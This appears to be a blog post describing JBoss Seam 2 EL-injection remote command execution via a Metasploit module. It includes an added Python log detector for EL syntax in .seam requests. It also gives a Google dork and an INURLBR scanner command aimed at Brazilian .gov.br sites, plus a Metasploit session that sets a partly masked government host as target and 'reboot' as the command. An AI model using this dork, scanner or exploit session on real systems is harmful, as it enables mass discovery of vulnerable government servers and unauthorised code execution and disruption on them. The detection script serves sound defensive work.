JBoss Seam 2 Remote Command Execution - Metasploit
JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This module has also been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
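Because the issue is reached through a crafted URL carrying EL syntax, it leaves a trace in web server access logs. The following is an added detection example, not part of the original post or of the Metasploit module: it flags requests to .seam pages whose query string contains an EL expression opener after repeated percent-decoding. The combined log format, the parameter name "param" and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Combined-format access log line (assumed format; adjust to your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
EL_OPEN = re.compile(r'[#$]\{')  # EL openers: deferred "#{" and immediate "${"
MAX_DECODE_ROUNDS = 3            # assumption: unwraps double/triple encoding

# Constructed sample lines; "param" and "expr" are hypothetical placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /app/home.seam?cid=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /app/home.seam?param=%23%7Bexpr%7D HTTP/1.1" 302 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /app/home.seam;jsessionid=ABC?param=%2523%257Bexpr%257D HTTP/1.1" 302 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /static/app.js?v=%23%7B HTTP/1.1" 200 900',
]


def fully_decode(value):
    """Percent-decode repeatedly so nested encodings such as %2523 are unwrapped."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_el_in_seam_requests(lines):
    """Return (ip, path, status) for .seam requests whose query carries EL syntax."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        # Split by hand: a raw '#' must stay in the query, not become a fragment.
        raw_path, _, raw_query = m.group("target").partition("?")
        path = fully_decode(raw_path).split(";")[0]  # drop ;jsessionid=...
        if not path.lower().endswith(".seam"):
            continue
        if EL_OPEN.search(fully_decode(raw_query)):
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in find_el_in_seam_requests(SAMPLE_LOG):
        print("EL syntax in Seam request:", hit)
```

Access logs only record the request line, so EL syntax sent in a request body needs proxy or WAF logging to be seen.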
- MODULE METASPLOIT: auxiliary/admin/http/jboss_seam_exec
- COMMAND SCANNER INURLBR: /inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6
- DORK: site:.gov.br inurl:.seam intitle:"JBoss Seam Debug"
Configuration:
- CMD - The command to execute.
- RHOST - The target address
- RPORT - The target port
- TARGETURI - Target URI
msf > use auxiliary/admin/http/jboss_seam_exec
msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br
msf auxiliary(jboss_seam_exec) > set RPORT 80
msf auxiliary(jboss_seam_exec) > set CMD reboot
msf auxiliary(jboss_seam_exec) > set TARGETURI /******/home.seam
msf auxiliary(jboss_seam_exec) > exploit
REFERENCE: http://www.rapid7.com/db/modules/auxiliary/admin/http/jboss_seam_exec
SCANNER INURLBR: http://github.com/googleinurl/SCANNER-INURLBR